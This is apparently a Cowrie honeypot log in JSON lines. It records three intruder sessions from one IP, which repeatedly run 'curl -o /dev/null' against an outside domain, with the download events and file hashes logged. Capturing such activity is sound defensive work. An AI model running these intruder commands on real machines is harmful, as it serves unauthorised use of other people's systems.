{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.555454Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.556583Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.557373Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.560508Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.561275Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.564065Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.566008Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.566956Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.573577Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.577070Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.581024Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.613981Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.614791Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.618517Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.622002Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.625253Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.626474Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.627233Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.629834Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.630428Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.641500Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.688457Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.689467Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.695841Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.700210Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.715349Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.716117Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.718561Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.720768Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.726507Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.732269Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.765167Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.767241Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.767855Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.769971Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.773497Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.775840Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.776787Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.796647Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.797682Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.800818Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.804116Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.809379Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.839365Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.840615Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.841235Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.844135Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.844827Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.848066Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.848557Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.877626Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.878287Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.881323Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.882556Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.884972Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.885517Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.915501Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.916655Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.920213Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.922369Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.923022Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.927073Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.927742Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.955364Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.956006Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.960038Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.960590Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.965193Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.965784Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.996070Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.996973Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.001778Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.004409Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.009269Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.009985Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.011240Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.011904Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.042947Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.044074Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.044491Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.068099Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.068776Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.070588Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.071214Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.082305Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.082962Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
